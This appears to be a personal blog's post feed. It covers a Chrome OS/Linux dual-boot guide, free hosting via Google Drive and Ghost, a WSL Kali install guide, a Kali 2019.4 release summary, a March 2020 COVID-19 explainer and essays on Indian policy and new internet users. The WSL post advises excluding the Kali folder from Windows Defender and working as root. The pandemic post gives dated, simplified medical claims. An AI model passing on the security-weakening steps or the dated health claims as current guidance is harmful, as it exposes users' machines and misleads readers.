Don't hurry, read each and every word I typed. I minimised as much as possible

Downloads

Linux Mint Cinnamon Image
Rufus
Chrome Recovery Image
Brunch
Multi Installer

Precautions

Get a second pendrive
Install windows 10 or Your OS in it

Confirmations and Modifications if required

Convert your Windows from Legacy support to UEFI
Convert MBR to GPT

If you feel you have the required prerequisites go on and download all the necessary files. If you have any doubts or in need of any clarifications you can always google them or leave a comment in the comment section - you might not get the answer immediately but i'm sure I will try to help you ASAP.

So by now you should have the top 2 downloads mentioned above. One being Linux Mint Cinnamon and the Other being Rufus.

If you are aware of creating your own bootable pendrive without any external software like Rufus you can also follow that or else follow my instructions.

Creating a bootable pendrive of Linux Mint Cinnamon

16gb pendrive
Select the Linux Mint Cinnamon 64 bit ISO
Keep all other options as per recommendations and proceed to next
I would like to call this pendrive i.e., newly created Linux Mint bootable pendrive asNewly Created Bootable Pendriver

Adding Files and Scripts in the newly created bootable pendrive for later use

Create a new folder (named:Chrome OS) in our Newly Created Bootable Pendrive - I would like to call this new folder asManually Created Folder
Extract "Bruch" - previously downloaded, Copy the files in extracted brunch folder, Paste the copied files in the Manually Created Folder of our Newly Created Bootable Pendrive, i.e., named as Chrome OS.
Extract "Chrome Recovery Image" - previously downloaded, rename the extracted file asrammus_recovery.bin, copy and paste it in the Manually Created Folder of our Newly Created Bootable Pendrive
Copy and paste Multi-installer.sh - previously downloaded in the Manually Created Folder of our Newly Created Bootable Pendrive
Remember there should be a total of 6 files in the Manually Created ''Chrome OS" Folder of our Newly Created Bootable Pendrive

Before creating a partition I would like you to check if your device is using a MBR or GPT partition style. Why to check? Always remember by default windows will not allow users to install Windows 10 OS in MBR. So it is always a best practice to check the type of your disk.

Creating a Partition for for Linux Mint and Chrome OS

Instal Linux Mint

Installing Chrome OS

Content Organisation of lectures conducted by professor Vinita Devi on UPSC Maths Optional

Sat, 16 May 2020 14:14:34 GMT

About Professor

Hindu college Alumni, Teach for India fellowship, teaching UPSC. Environment, art and culture and Answer Writing sections.

About the Course

In this course, Vinita Devi will cover important topics of Mathematics. This is a detailed course on mathematics optional along with previous year questions which will provide a detailed understanding of the topics that will be helpful in solving subjective based questions as well as in the analytical understanding of the topics. This course will be helpful for UPSC aspirants. The course will be conducted in English and the notes will also be provided in English.

Materials provided by the course

Reference Materials

Algebra Schaum's

Unacademy Lectures

Lecture 01
Lecture 02
Lecture 03

5 Pillars of Self Reliance and 4L's to promote Make In India.

Tue, 12 May 2020 16:06:01 GMT

In a speech to the nation tonight, Prime Minister Narendra Modi enlightened us with the 5 Pillars and announced an economic package to tackle the downside of the corona-virus crisis.

The PM in his speech at 8 pm highlighted that India must realise its potential as the lead player in the 21st century by focusing on its self-reliance.

The 5 pillars for Self-Reliance:

Economy with potential for quantum jump
Infrastructure
Technology-driven System
Vibrant Demography
Intelligence-driven Supply system

An economic package of Rs 20 lakh crore, amounting to 10% of GDP, will help India realise its full potential, he said. The package is to be factored on these 4L's.

4L's for Make in India:

Land
Labour
Liquidity and
Law

These 4L's will promote Make In India even while rescuing MSMEs, farmers and others, he said.

Winter is coming in Southern Hemisphere! Which might create another cycle of Coronavirus, says Anthony fauci.

Fri, 27 Mar 2020 16:06:01 GMT

Who is Anthony Fauci?

Anthony Stephen Fauci is an American physician and immunologist who has served as the director of the National Institute of Allergy and Infectious Diseases since 1984.He has been a key figure for the American public since the corona virus outbreak began.

Anthony Fauci's comment on 25th March 2020

What we're starting to see now in the southern hemisphere in southern Africa and in the southern hemisphere countries is that we're having cases that are appearing as they go into their winter season. In fact, if they have a substantial outbreak, It will be inevitable that we need to be prepared that we'll get a cycle around the second time.

What does that mean for us? In what we're doing it totally emphasizes the need to do what we're doing in developing a vaccine, testing it quickly and trying to get it ready. So they will have a vaccine available for that next cycle.

In addition, doing the randomized controlled trials of drugs. So that we will have a menu of drugs that we have shown to be effective and shown to be safe because I know we'll be successful in putting this down now. But we really need to be prepared for another cycle and what we're doing I believe will prepare us well.

Hosting a complete functioning website for free by using Google Drive

Fri, 27 Mar 2020 04:07:49 GMT

Did you know that you can use Google Drive to host a variety of different websites varying from basic websites to even complex javascript web apps? If not, let's take advantage of Google Drive’s free storage to upload and publish any kind of static content to host a website or host your personal collections online.

At the end of this blog, you will be able to create your own domain name and host your website in it for free.

https://8w6zy6ghk3l0jcu5jb3xgq-on.drv.tw/www.akhilnaidu.tk/

http://www.akhilnaidu.tk (After configuring your domain using Freenom)

Small information for better understating of this.

A simple definition of “hosting” for people who are new to this. Hosting means storing files/software in a place where everyone can access it. Those files can vary from simple code to complex algorithms or even a collection of pictures. As you already know Google is also proving us an option to store or share files personally and publicly, which in a way has the capability of hosting a website.

Advantages

It's totally free
No bandwidth limits and always up
No FTP software required
Replacing files in G Drive will update your website

Disadvantages

If you want to replace your previous website which is from WordPress or Joomla or any PHP based websites, this will not work for you.
This is only for static websites, ie, content remains constant

How can use it at your advantage

Personal blog/ website for free of cost
Your online resume
A simple collection of data, for your future self.

There are many other wide varieties of ways you can use it, but the purpose was the same in all. You are making yourself a place in the Online community, having an account in Facebook and Instagram is not defined as being online, it is being socially online.

Things required for a decent website/blog

I don’t want to leave you halfway with a feel of in-completion. At the end of this article, if you gain some interest and have time to work, you should be capable of doing a lot more than just what I taught. For you to be in a position to work alone without any difficulties there should be a decent number of tools to use and concepts to be clear in the head. Here, I’m introducing you to some of them.

Some files to host online(Hello world blog post)
Drive to Web (In a way converting GDrive to Github)
Name for your website for free of cost (Freenom, Github Domain)

Step-01: Registering a Domain name using Freenom

Let’s start by choosing and creating a name for our website. I would like to use my name, "akhilnaidu", as the name for my blog in this guide.

Create an account in Freenom, preferable use google to signup
Now in the top menu, go to Service > Register New Domain
Check availability of the name, for this article I’m using my name, “akhilnaidu”
Select one free domain and proceed to checkout
Chane the period to 12months@Free and leave the rest.
Check the terms and conditions and complete Order

In most cases, the order completion will be done instantaneously, so go to your client area and check it, if not it will done in a few minutes, In the meanwhile let’s proceed to the next step

Step-02: Hello world HTML document in GDrive

Create a folder with your domain name starting with “www” and add your domain name as tail, ex:”www.akhilnaidu.tk”
Make this folder shareable to public
Create a blank HTML file, in it.
Copy this, for demo post, you can change this later.

<html>
<header>
    <title>Demo Title: Naidu's Blog</title>
</header>

    <img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2019/11/logo-1.png" alt="Leewardslope Logo">
    <br><br><br>
    This is how you start writing your first post, you can use all the html features

</html>

Step-03: Configuring Drive to Web

Open this link, https://drv.tw or click here
Select google drive
Sign in with the email associated with the google drive where you uploaded the website files
Click allow and if asking for any permissions, give it.
Now your website is hosted in google drive for free, and you will receive the new URL

Step-04: Using your domain as URL

Copy the above URL provided in the admin panel of Drive to Web without the text that comes after the drv.tw and without https and go to Freenom client area

ex: Drive to Web URL: https://8w6zy6ghk3l0jcu5jb3xgq-on.drv.tw/www.akhilnaidu.tk\ Required URL: 8w6zy6ghk3l0jcu5jb3xgq-on.drv.tw
Go to your domain, "akhilnaidu.tk ", and press manage domain
Select, “Manage Freenom DNS”
Create a new record with

Name: WWW
Type: CNAME
TTL: 3600
Target: Copied URL, ex: 8w6zy6ghk3l0jcu5jb3xgq-on.drv.tw
Target URL should end with drv.tw and should not contain https

Next is all up-to you

The record should take upto 30 minutes to get acceoted globally. You can track the progress of propagation with the help of these tools.

whatsmydns.net, a proxy tool which bypasses DNS and Local cache
Kproxy, anothey proxy server

Congratulations!! Your website is now online with no hosting cost. The cost you have to pay is attention towards this blog, some spare time and interest to do something useful and some space in google drive.

Check the website I created while writing this blog:

Now by replacing the index.html file with your desired html file, like your CV or Blog Post you can have your own personal portfolio or you can create your own personal website if you use some HTML Templates

Facts to know beforehand on coronavirus to understand the harsh policies of our government

Tue, 24 Mar 2020 05:44:01 GMT

What actually happens when it infects a human and what should we all do?

A virus is really just a hull around genetic material and a few proteins, arguably not even a living thing. It can only make more of itself by entering a living cell. Corona may spread via surfaces, but it's still uncertain how long it can survive on them. Its main way of spreading seems to be droplet infection when people cough, or if you touch someone who's ill and then your face, say rubbing your eyes or nose. And this simple reason made it a pandemic.

The virus starts its journey here and then hitches a ride as a stowaway deeper into the body. Its destinations are "the intestines", "the spleen" or "the lungs", where it can have the most dramatic effect.

Even just a few coronaviruses can cause quite a dramatic situation.

Process of Infection

The lungs are lined with billions of epithelial cells. These are the border cells of your body, lining your organs and mucosa waiting to be infected. Corona connects to a specific receptor on its victim's membranes to inject its genetic material into a cell.

The cell, ignorant of what's happening, executes the new instructions as always, which are pretty simple: "copy and reassemble". It fills up with more and more copies of the original virus until it reaches a critical point and due to large number of foreign infiltration it receives one final order, "self-destruct". The cell sort of melts away, releasing new corona particles ready to attack more cells.

The number of infected cells grows exponentially After about 10 days, millions of body cells are infected, and billions of viruses swarmed the lungs.

The real problem starts now, confusion within our immune system

The virus has not caused too much damage yet, but the corona is now going to release a real beast on you, your own immune system. The immune system, while there to protect you, can actually be pretty dangerous to yourself and needs tight regulation. And as immune cells pour into the lungs to fight the virus, Corona infects some of them and creates confusion.

Cells have neither ears nor eyes. They communicate mostly via tiny information proteins called cytokines. Nearly every important immune reaction is controlled by them. Corona causes infected immune cells to overreact and yell bloody murder. This is due to a lot of infection in lungs which was never experienced by your body. In a sense, it puts the immune system into a fighting frenzy and sends way more soldiers than it should, wasting its resources and causing damage.

Among these immune soldiers, Two kinds of cells in particular wreak havoc. First, "Neutrophils", which are great at killing stuff, including our cells. As they arrive in their thousands, they start pumping out enzymes that destroy as many friends as enemies. The other important type of cells that go into a frenzy are "Killer T-cells", which usually order infected cells to commit controlled suicide. Confused as they are, they start ordering healthy cells to kill themselves too. The more and more immune cells arrive the more damage they do and the more healthy lung tissue they kill. This might get so bad that it can cause permanent irreversible damage, that leads to lifelong disabilities.

In most cases, the immune system slowly regains control. It kills the infected cells, intercepts the viruses trying to infect new ones and cleans up the battlefield. "Recovery begins".

Why is COVID19 Deadly if we can recover our self

The majority of people infected by Corona will get through it with relatively mild symptoms. But many cases become severe or even critical. We don't know the percentage because not all cases have been identified, but it's safe to say that there is a lot more than with the flu. In more severe cases, Millions of "epithelial cells" have died and with them, the lungs' protective lining is gone. That means that the "Alveoli - tiny air sacs via which breathing occurs"- can be infected by bacteria that aren't usually a big problem. Patients get "Pneumonia". Respiration becomes hard or even fails, and patients need "Ventilators" to survive.

The immune system has fought at full capacity for weeks and made millions of antiviral weapons. And as thousands of bacteria rapidly multiply, it is overwhelmed. They enter the blood and overrun the body; if this happens, death is very likely.

The future of a pandemic like Corona

Coronavirus is often compared to the flu, but actually, it's much more dangerous. While the exact death rate is hard to pin down during an ongoing pandemic, we know for sure that it's much more contagious and spreads faster than the flu. There are two futures for a pandemic like Corona: One, "fast" and other was "slow".

Which future we will see depends on how we all react to it in the early days of the outbreak.

A fast pandemic will be horrible and cost many lives; a slow pandemic will not be remembered by the history books. The worst-case scenario for a fast pandemic begins with a very rapid rate of infection because there are no countermeasures in place to slow it down.

Why is a fast pandemic so bad?

fast pandemic - Will not have any protective measures.
Slow pandemic - Everyone will be covered under health care.

In a fast pandemic, many people get sick at the same time. If the numbers get too large, health care systems become unable to handle it. There aren't enough resources, like medical staff or equipment like ventilators, left to help everybody. People will die untreated. And as more health care workers get sick themselves, the capacity of health care systems falls even further. If this becomes the case, then horrible decisions will have to be made about who gets to live and who doesn't. The number of deaths rises significantly in such a scenario.

To avoid this, the world - that means all of us - needs to do what it can to turn this into a "Slow pandemic". A pandemic is slowed down by the right responses. Especially in the early phase, so that everyone who gets sick can get treatment and there's no crunch point with overwhelmed hospitals. Since we don't have a vaccine for Corona, we have to socially engineer our behavior, to act as a social vaccine. This simply means two things:

Not getting infected and
Not infecting others.

A way to destroy corona

Although it sounds trivial, the very best thing you can do is to "wash your hands". The soap is actually a powerful tool. The coronavirus is encased in what is basically a layer of fat; soap breaks that fat apart and leaves it unable to infect you. It also makes your hands slippery, and with the mechanical motions of washing, viruses are ripped away. To do it properly, wash your hands as if you've just cut up some jalapeños and want to put in your contact lenses next.

The next thing is "Social Distancing", which is not a nice experience, but a nice thing to do. This means no hugging, no handshakes. If you can stay at home, stay at home to protect those who need to be out for society to function: from doctors to cashiers, or police officers; You depend on all of them; they all depend on you to not get sick.

My perspective towards this Pandemic and to the Prevention measures of our government

On a larger level, there are quarantines, which can mean different things, from travel restrictions or actual orders to stay at home. Quarantines are not great to experience and certainly not popular. But they buy us - and especially the researchers working on medication and vaccinations - a crucial time

So if you are put under quarantine, you should understand why, and respect it. None of this is fun. But looking at the big picture, it is a really small price to pay. The question of how pandemics end depends on how they start; if they start fast with a steep slope, they end badly. If they start slow, with a not-so-steep slope, they end okay-ish. And, in this day and age, it really is in all of our hands. If we understand this there is no need for the government to take harsh policies and actions.

An advice to all the beginners of Pentesting and Cybersecurity or Hacking

Sat, 21 Dec 2019 02:14:32 GMT

Hacker is not someone who wears hoodie every single time.
Hacker is not someone who stays in dark room.
Hacker is not someone who uses his keyboard like some keyboard masochist.
Hacking is not just something that can be done with one tool.

The problem with the beginners

Now, I've been dealing with beginners since a long time (and myself was one for a long time too). What they want is magic. A tool which is easy to use, works on Windows, can be download by searching on Google and clicking on the first link we see, and will do all the hacking itself on the push of a button. Sadly, no such tool exists (lets be real, would you use Facebook if a tool existed which you could install on Windows, simply type the person's username/mobile number/email and then just like that get his/her Facebook password?).

Taking out my Frustration

Hacking is an art, and it takes years of practice to master it. So how to get started? Having no idea about hacking is okay, but being a newbie with computers in general is not allowed. When I say beginner, I mean someone who has no experience with programming and with hacking methodologies. I didn't mean someone who needs a 1 page guide on how to download a tool. If you want to be a hacker, you have to work hard. So how to get started? First start with installing Kali Linux, Without an appropriate OS you can never call yourself a hacker or cyber security expert.

How to install Linux (Ubuntu or Kali) in Windows-10 without Dual Boot, Virtualbox, VMware using WSL

Fri, 20 Dec 2019 01:43:20 GMT

In this tutorial, we’ll be installing Linux on our Windows machine, by using the WSL feature(no VM or dual booting required). WSL(Windows Subsystem for Linux) is a Windows 10 feature that provides you with a Bash shell, which you can use to execute Linux commands and run Linux applications.

Linux on ... Windows? Really?

While this setup of Linux on Windows is not optimal due to various environmental restrictions (such as the lack of raw sockets and lack of customised Kali or ubuntu kernel), there are still many situations where having Kali Linux alongside your Windows 10 machine can be beneficial. One example that comes to mind is consolidation of workspaces, especially if Windows is your main working environment. Other useful situations that crossed our minds were programming and compiling code for students, standardizing tools and scripts to run across multiple environments, quick porting of Linux penetration testing command line tools to Windows, etc. For example, below is a screenshot of running the Metasploit Framework from Kali Linux, over WSL

Setting up Environment

Here’s a quick description of the setup and installation process. For an easier copy / paste operation, these are the basic steps taken:

Update your Windows 10 machine.
Open an administrative PowerShell window and install the Windows Subsystem with this one-liner. A reboot will be required once finished.
```
Enable-WindowsOptionalFeature-Online-FeatureNameMicrosoft-Windows-Subsystem-Linux
```
Once rebooted, open the Windows App store and search for the “Linux” application, or alternatively click here to go there directly. Install the app and enjoy your specified linux distribution (Kali, Ubuntu, Debain)!

Steps common for every linux distribution

After installing retry opening your Linux Distribution. If everything went right Linux should be getting installed automatically. After everything is done installing you will be prompted to create a user account.

With that done, you'll be prompted to create a Unix username and password. Congratulations, you're all set up and running a Linux subsystem on your Windows machine!

Beginners Tips:

Remember the entered credentials, you need to use it for every sudo command
Don't forget to update it regularly just like any Linux system.
- sudo apt-get update
- sudo apt-get dist-upgrade
If hard drive space is a concern, then don't forget to clean up the apt directory.
- sudo apt-get clean
Use this, If you don't want to use sudo every time you use your console.
- sudo su
This will prompt you with your administrator account password, after successful entry of credentials you will be in root shell and there is no need to add sudo in-front of your terminal commands.

With this your Linux Distribution is ready to go. But I want to mention some important steps for making your life easier in a lot of ways. For now i'm focusing mainly on these important aspects any further suggestions can be mentioned in the comments below, so I can update this post thoroughly.

Exchanging files, mainly for ubuntu users ie. programming beginners and students.
Windows Firewall Exceptions, mainly for Kali users, as many tools are detected as virus by windows defender.

If you are wondering to know about Linux GUI: Yes, GUI is possible and note that WSL is not really meant to include a GUI (graphical user interface), but you can install it if you feel like it. Check out how to do it here

Copying/moving files from Windows to Ubuntu

At some point, you will probably need to exchange some file between Windows and Linux. One way of doing that is going to the Linux installation folder with windows explorer. You can find the Linux install location at: C:\Users\”Windows User”\AppData\Local\lxss

Don't forget to replace "Windows User" with your actual username!

But using file explorer to access the Linux installation folders isn’t the best way of doing things. Instead, you should be using the following method to copy and move files.

sudo cp /(file path)/(destination directory)

Sudo is used to give root permissions to non-root users. That is also why I was prompted for the password. The cp command copies the file specified in the first path to the location specified by the second path. The windows C: drive is located in the /mnt directory. If you would want to move the file instead of copying it just use the mv command in place of cp.

Add Windows Defender Exclusion for Kali users

Unfortunately, Windows Defender doesn't always like to play nice with the tools in the Kali repository. Sometimes, it detects them as viruses and/or malware and blocks some portion of the program. To prevent these errors, it's a good idea to go ahead and add a Windows Defender exclusion for the Kali Linux folder.

First, find that folder by opening File Explorer and entering the following location in the address bar. **C:\Users"Windows User"\AppData\Local\Packages**

Don't forget to replace Windows User" with your actual username!

Now, open the Kali Linux folder which should look something like "KaliLinux.54290C8133FEE_*******" and copy the folder location.

With that in hand, search for "Windows Security" in the Cortana search bar the bottom left of the screen. Within the Security Center, click on "Virus & threat protection" represented by a shield on the menu to the left side of the screen.

Next, click on the cog in the bottom, then manage setting under"Virus & threat protection settings," then scroll down to the bottom under Exclusions and click "Add or remove exclusions." Then press the plus icon beside "Add an exclusion," select "Folder," and then paste the Kali folder address in the top bar. Click "Select folder," and a popup will appear — click "Yes" to add the exclusion.

If you ever want to remove this exclusion, simply click on the down arrow beside the folder location, and click "Remove."

With the Windows Defender exclusion in place, you're ready to get started with your ethical hacking. Not much comes preinstalled in this version, so install tools you wish to use from the Kali repository as you normally would with the apt-get command. Click here for detailed tutorial for installing all kali linux tools.

Food for thought

The availability of the Kali Linux platform or Ubuntu Platform and toolset on Windows 10 brings with it many exciting possibilities which we haven't even begun to grasp. But frankly I would suggest this method of using Linux Distribution for students/programming beginners/linux beginners in windows desktop as main environment. I'm always glad to help my fellow linux lovers, just comment it below or contact me through any of my social media accounts.

Hosting a Ghost Blog for free

Wed, 04 Dec 2019 14:29:51 GMT

You may have noticed my blog is running Ghost, one of the best blog platforms in the world. But what if I told you that I hosted this Ghost blog for free. Follow along and even you can find fews ways to launch your ghost blog for free.

No need to use medium, ghost covers it all. It even introduced a new way to earn money for both premium bloggers and starters.

A boring Introduction, but absolutely necessary

There are many ways you can host a ghost blog, but usually people prefer to host their ghost blog in three ways:

Ghost (pro): starts with 29$ per Month
Self Hosting: Digital Ocean Droplet 5$ per Month
Free method: Which we are looking into.

Asusually, There are always pros & cons for every method. But before we proceed to the Free Method, let's get a brief idea about the first two methods and how the free method is different from above two. Which will helps us to compensate our cons by using some third party services (Which were also free).

#1 Ghost(Pro)

It is the indigenous way of hosting ghost, which suggests that there are not many cons in it except for the price. There are 3 different plans provided by the ghost org and listed below.

Basic (29$)
Standard (79$)
Business (199$)

#2 Self Hosting

You can host almost any open source projects on your own, if you have the required hardware. And I would suggest using Digital Ocean for the following reasons:

Fast and Reliable
Special Offers if you are a student
One Click Ghost Installer
It only cost 5$ per Month
Full Control of your blog and VPS

In Fact, you will not be able to find many difference between Ghost(pro) and Self-Hosted ghost.

Here are few differences that matters most among a tiny list:

No official and personal support from Ghost org.
No CDN and Caching.
No SSL certificate and Personal Security

#3 Hosting Ghost for Free

There are again 3 ways to host ghost blog for absolutely free of cost.

DigitalPress.
Heroku.
Netlify.

But in this present session, I would prefer to suggest only one ie., fastest and new way of installing ghost for free.

Digitalpress

DigitalPress is really free. Their ambition is to enable everyone to tell their story without having to think about price. The free plan includes variety of themes and design layouts to show your style. Customize blog with your own cover pictures, embed videos, tweets, music clips and share joy with your readers.

Your blog is supported by ads. Digitalpress pay close attention to pick ads which are relevant to your audience to match your content and their interests.

Create account in DigitalPress and follow the below steps:

Step 01: Create New Blog
Step 02: Choose name of your blog
Step 03: Click on Ghost Administrative dash board
Step 04: Create ghost admin account
Step 05: Configure DNS in DigitalPress Dashboard

Thatsit, your ghost blog is online and you can choose between a various number of themes provided by default. This blog is hosted in such a way.

Other Tweaks

Heroku
Netlify
Free domain
Configuring Free ssl and caching (cloudflare)

If you can see this, which means, I still work under this project to improve the accessibility of other tweaks.

Kali Linux 2019.4 includes a new undercover mode for pentesters doing work in public places

Wed, 04 Dec 2019 12:47:54 GMT

Offensive Security, maintainers of the popular Kali Linux open source project, released Kali Linux 2019.4, the latest iteration of the Kali Linux penetration testing platform. The new release includes several new features, including a new default desktop environment, a new theme and a new undercover mode for pentesters doing assessment work in public places.

Move from Gnome to Xfce

The most noteworthy aspect of the 2019.4 release is Kali’s move from the Gnome environment to Xfce to address some known issues. Specific improvements as a result of the new environment include:

#1 Improved performance

The Gnome environment is a fully-featured desktop environment with many capabilities. However all the capabilities come with overhead that is often not useful for a distribution like Kali. Moving to the more lightweight Xfce environment addresses these issues, providing an environment more in line with the typical Kali user’s needs.

#2 Unified UI

Because Kali can be run on everything from bare metal to high end laptops, the lower-end ARM builds often had a different UI than other deployments. OffSec now offers a standardized UI for all Kali distributions.

#3 Kali Undercover

Let’s say you are working in a public place and you might not want the distinctive Kali dragon for everyone to see and wonder what it is you are doing.

The developers made a little script that will change your Kali theme to look like a default Windows installation. That way, you can work a bit more incognito. After you are done and in a more private place, run the script again and you switch back to your Kali theme.

Other Kali Linux 2019.4 updates

Kali Documentation has a new home and is now Git powered
Public Packaging – getting your tools into Kali
Kali NetHunter KeX – Full Kali desktop on Android
BTRFS during setup
Added PowerShell
The kernel is upgraded to version 5.3.9
Plus the normal bugs fixes and updates.

My final thought

Bye, Gnome, Hi, Xfce… The latest iteration swaps Gnome for Xfce as its main desktop environment, although users can keep a slightly tweaked Gnome build if they want. But as the Kali Linux team put it in a blog today:

“Gnome has been overkill for most Kali users, as many just want a window manager that allows you to run multiple terminal windows at once, and a web browser.”

The biggest myths about the next billion internet users

Wed, 04 Dec 2019 12:26:10 GMT

A Kenyan farmer stands proudly, looking at his crops while talking on his mobile.
A group of Bangladeshi women cluster around a phone to get some health information.
Children in an Indian slum look absorbed as they navigate their way through an educational gaming app.

These are some typical images that the media use to portray the way mobile technologies are transforming lives in developing countries. The weight of chronic poverty seems lifted with the intervention of a mobile phone. These images have become so repetitive that the media has lost interest in them.

Investing in these “next billion users” is today a critical business strategy for technology companies.

This blind optimism of mobile phones empowering people comes from a long legacy of wealthy nations, international corporations, and aid agencies in the West “doing good” through tech innovations. A mobile phone, for instance, is expected to help the poor “leapfrog” their way to a better life, the ultimate self-help solution to global inequality. Poverty is an opportunity and scarcity is a resource; the poor are the experts in leveraging mobile apps to get a better life for themselves, if we are to believe this narrative.

While investing in these “next billion users” started as supposed altruism decades ago, today it is a critical business strategy for technology companies. It is no surprise that in 2018 alone, numerous symposiums, initiatives, labs, and products have been launched to target these users. Leading the pack is Google with its Next Billion User (NBU) Market division.

The innumerable global poor have gained a new value: They are now not just consumers but producers of data in this digital economy. As data are the ”new oil,” viewed as crucial for future innovation, tech companies are waking up to the possibility of this vast and relatively untapped well of new data.

After all, many of these next billion users are young and live outside the West, and are passionately shaping the internet. Four in 10 people in the world are below 25 years of age, and 85% of them live in developing countries. Today China has about 800 million internet users in contrast to the 300 million in the United States. India has the most WhatsApp users worldwide.

And unlike the first billion users who, for the most part, were middle-class and lived in wealthy countries, these next billion users are substantively low-income and live in poorer countries. While half the planet’s population, 3.8 billion people, are low-income, they are enthusiastic adopters of the mobile phone. From South Africa to Brazil, young people are taking to the mobile internet with gusto, due to the increased affordability of these devices and data plans.

As tech companies compete to gain these users’ attention and their data, the question remains if these organizations truly know who these users are—what are their preferences, desires, aspirations, and motivations for getting and staying online?

Currently, tech innovations are being built on some powerful and persistent myths about these users. AI for Good initiatives, launched by public-private partnerships, continue to focus on what they assume these users need versus what they want. Data regulations driven by Western concerns are being applied in a one-size-fits-all manner to these new users, with an assumption that they must have the same concerns about privacy as those in wealthier countries.

But these concerns are not the same because of the political and social circumstances in many of these new users’ lives. Though a teen girl in Boston and Riyadh may both use the internet to seek romance, the former enjoys far more freedom in the way she is able to curate her profile and share her images with the public. While regulating online “hate speech” is a critical issue in Germany and Pakistan, one nation is concerned with suppressing neo-Nazi content while the other makes citizens abide by the country’s blasphemy law by digitally monitoring negative remarks on the Koran and the prophet.

It’s time to start seeing these users for who they are. To do that, we need to start busting some myths.

Myth # 1: The next billion users are driven by basic needs

I had interviewed my uncle who is working as a researcher and as a liaison for aid agencies for more than a decade in India, Brazil, and in recent years in, South Africa and Namibia. He was very much part of the “doing good” tribe. However, since early 2000, He encountered a pattern of usage among low-income young people that didn’t quite align with the pervasive tech evangelism.

Yes, farmers did use some of their mobile data to check crop prices, just as women googled birth control options, and kids learned some words of English online. For the most part, however, much of the mobile data and screen time were dedicated to porn, romance, chatting with friends, and entertainment such as music, movies, and gaming.

One of his first tech for development projects was in rural India in early 2000 where He served as a liaison between a non-profit, an aid agency, and a tech company. They aimed to provide a “24/7” experience of streaming information through cybercafes. They expected locals would use the cafes to search for jobs and education. But instead we found them primarily using this tech for leisure. The cybercafes’ main revenue came from Orkut, a popular social networking site at the time.

If it wasn’t for Orkut or facebook, many computers would not be used much.

The cybercafes transformed into recreational hubs. Govind Bhisht, a cafe owner, expressed his gratitude for Orkut: “Honestly, it’s the students that keep this place going. It’s changed so much. They sit all day doing these friendship sites like Orkut. Day in and day out… if it wasn’t for Orkut, my computers would not be used much.” Five years later, I returned back to this village. Some things had changed. Facebook had overtaken Orkut as the young people’s primary addiction, and mobile phones replaced cybercafes as the powerful portals of entertainment. But people’s need to connect and socialize remained the same.

In a favela in Belo Horizonte, my team found young Brazilians equally obsessed with social media. They were addicted to living the digital life. “Even when I’m sleeping, I’m connected,” said Pablo, a young man who is an assistant mechanic. When asked how frequently he checks his Facebook or WhatsApp, he responded “the entire day… every day, every hour,” and claimed to only take a break when sleeping.

The shocking result from years of studying how the global poor engage with new applications is that they are like us.

They are not extraordinarily disciplined or significantly virtuous or productive with these digital resources. They want what we want: connection, entertainment, fun. If anything, they spend disproportionately more time on this leisure than we do. A significant amount of their monthly income gets diverted to their data plans, so, for instance, a boy can at last chat up a girl on Facebook. While people in wealthy nations spend about 2% of their monthly income on data, this can go as high as 5% among people in low-income countries. This should not be surprising. Many of these young people live in deeply conservative societies where arranged marriages are the norm. WhatsApp and Facebook double as Tinder and Grindr as young people go about hunting for the possibility of romance

.In rural Namibia, almost 50% of young people are without jobs. So entertainment becomes a way people make their lives a little more bearable, a little more humane, and a little more interesting. Engaging with each other online can ward off depression. Sadrag Shihomeka, a PhD student at Erasmus University, and I found that while many of these young Namibians were building networks for jobs through Facebook, they were mainly using their scant online minutes to listen to music, watch videos, and share jokes. On digital forums intended for job-seeking, they posted about their private lives—what they ate, what they did that day, photos from wedding parties—and waited for the comments to come in.

The shocking result from years of studying how the global poor engage with new applications is that they are like us.

This was in spite of the challenges in gaining internet access. Lleka, a young man from a Namibian village, explained that getting online is a matter of timing, “During the day the network is very weak…so you will find some people waiting till midnight to go and look for a specific point where they normally access the network.” Krista, a young woman from the same village noted that finding the right place for connectivity carries some risk, “We sometimes get the network at one spot in the neighbor’s field but that one you have to go around midnight…it is very risky as we have wild animals too here.”

The impact of Telecom Industries

Some telecom companies learned quickly that the best way to appeal to the next billion users was to offer radio apps such as NBC Ovambo in Namibia or Hungama in India. These apps offer nonstop music consumption, providing a much-needed distraction. Many of these youngsters waste much of their time sitting in traffic or standing in line for their welfare rations. Indian startups like Book my Chotu, allow people to hire these youngsters to stand in line for them or to do mundane errands. Fortunately for these young people, they can combine this work with play and escape the tedium of these jobs thanks to their mobile.

The Indian conglomerate Reliance Communications has paid careful attention to “winning the hearts” of these consumers. In December 2015, it launched the Jio network that offers the cheapest data bundles in the world. In partnership with Google, it has released 4G handsets at extraordinarily cheap prices. Its plan is to build a walled garden for these consumers, a “super app” like WeChat where these users can shop, game, socialize, and date, all in one digital space. This new tech business model rests fundamentally on the “ABCD principle”—inspired by what the Reliance telecom network data has revealed about the next billion users—most internet usage by this demographic tends to be directed towards Astrology, Bollywood, cricket, and devotion activities.

Myth # 2: Privacy will be the center of future global tech

Privacy has become of paramount concern to users in the West. Even Facebook is now calling itself a “privacy-focused social platform.” The question remains on where the next billion users stand when it comes to their online privacy.

Governments of developing countries have launched data mining initiatives of unprecedented scale and scope, from the Social Credit Score in China to the Biometric Identity scheme in India, in close partnership with the tech giants like Baidu, Tencent, Alibaba, and Infosys. In fact, one could argue that social media, AI, and big data are a dictator’s dream—they make citizens easily trackable and controllable.

“I will look for and friend certain names, like Jack or John for instance.”

The fact is that privacy is a luxury for most populations worldwide. Many of these new internet users live in one-room homes, shared with multiple family members. Some of them may never leave their settlement; their neighbors, families, and friends keep a watchful eye on their activities. Often, they live in conservative societies where they need to abide by restrictive cultural rules. This leaves little space for these young people to discover themselves. We must not forget that behind all this, they are inherently teenagers with the deep need to develop their identities. So often, despite the risks to their privacy, they go on Facebook and reveal their thoughts and dreams, and make themselves as public and as visible as possible. Given that few would be able to afford to see the world, they become “global citizens” by adding strangers on social media. Foreign friends are particularly desired as they can enhance one’s social capital. As one young Indian man puts it, “I will look for and friend certain names, like Jack or John for instance.” In the West fewer than 4% of Facebook “friends” are strangers; with these users, it can be as high as two-thirds.

